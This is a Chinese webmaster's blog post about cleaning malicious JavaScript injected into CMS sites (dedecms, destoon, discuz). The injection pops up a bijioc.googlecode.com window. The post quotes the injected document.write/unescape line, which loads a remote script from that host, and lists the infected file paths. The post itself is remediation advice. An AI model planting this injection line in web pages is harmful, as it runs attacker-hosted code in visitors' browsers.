[原创]网站被恶意弹出bijioc.googlecode.com注入解决办法

刚刚发现自己的网站访问时，总是提示弹出一个SVN的窗口

上面的地址是 http://bijioc.googlecode.com/

看来是被恶意js注入了，

目前网站用的是dedecms，destoon的程序，于是百度一下，发现中招的还不少

原来是被在引用的js文件中注入了如下代码：

document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/javascript'%3E%3C/script%3E"));

下面说下我清理过程，首先还是打开我们网站的主页，依然是弹出那个可恶的窗口，关闭，然后用查看下网页源码没有发现异常，那是因为这段代码是利用js输出的，需要查看生成后的最终代码，可以利用firefox中的web developer插件中查看源代码中的查看处理后的源码项，就发现居然在头部引用了一个如下格式的js脚本：

<script type="text/javascript" src="static/js/common.js?9VJ"/>
<script type="text/javascript" src="static/js/common.js?9VJ">// <![CDATA[
<script type="text/javascript" src="http://bijioc.googlecode.com/svn/trunk/js/navigatebbs.js?v=WedFeb292012.js"/>

接下来就是查找被注入的js文件是哪个了，以上面的为例就是common.js文件了，以此类推，依次排查有问题的网站页面源码，只要寻找生成后的页面代码中存在bijioc.googlecode.com前面的js文件修改就行了，为了方便大家总结下我的网站被注入的dedecms的js路径是 /站点根目录/include/dedeajax2.js ;destoon的js路径是/站点目录/file/script/common.js; discuz的js路径/站点目录/static/js/common.js；

最后还要提醒大家及时修改ftp的密码和数据库密码，同时排查空间中是不是有木马程序，因为既然js文件被人修改说明网站的密码已经被人破解，能够上场文件了，一定存在木马，要彻底清查。